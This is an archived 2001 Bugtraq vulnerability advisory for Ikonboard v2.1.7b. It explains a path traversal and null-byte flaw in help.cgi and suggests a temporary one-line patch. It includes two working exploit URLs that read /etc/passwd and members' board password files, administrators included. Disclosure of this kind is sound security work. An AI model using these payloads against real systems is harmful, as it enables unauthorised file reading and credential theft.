Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Ikonboard v2.1.7b "show files" vulnerability

From: "Martin J. Muench" <muench () GMC-ONLINE DE>
Date: Sun, 11 Mar 2001 18:43:09 +0100
-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com

-=[ Summary ]=-

This is another bug in the Ikonboard.
Anyone can read any file on the remote system with
the privileges of the web server.

-=[ Problem ]=-

File: help.cgi

---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the input for 'helpon'

---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open (FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it.
-> $inhelpon, remember?! ;)

Ok, i am not going to post the whole filter it uses because they really
have
been able to write a filter that is 24 lines long.
And they finally forgot to filter the backslash, so we can easily just
attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'.
And of course the scripts doesn't check for "..", so we can specifiy
every
path we want.

-=[ Exploit ]=-

Example:

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
- would show the password file, if it is readable with the privileges of
the
  web server.

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
- replace <member> with the member name and it shows you his/her
board-password.
  (works with Administrator accounts too)

-=[ Patches ]=-

Not yet available.
You could fix the script temporary by inserting the following line under
line 45 in 'help.cgi':

$inhelpon =~ s/\///g;

This is lame, but it works.

-=[ Greetings ]=-

Neilk - learned alot from you!
Marc Ruef - I promised it ;)
DukeCS - thanks for everything!
Marko - thanks for your help!
Tribunal - you taught me alot, thanks
ICB - long time no speak
Svoern - "go get 'em" ;)


So long,

Martin J. Muench <muench () gmc-online de>
http://mjm.gmc-online.de
http://www.german-secure.de

"Perl - The only language that looks the same before and after RSA
encryption."
- Keith Bostic
Previous By Date Next
Previous By Thread Next

Current thread: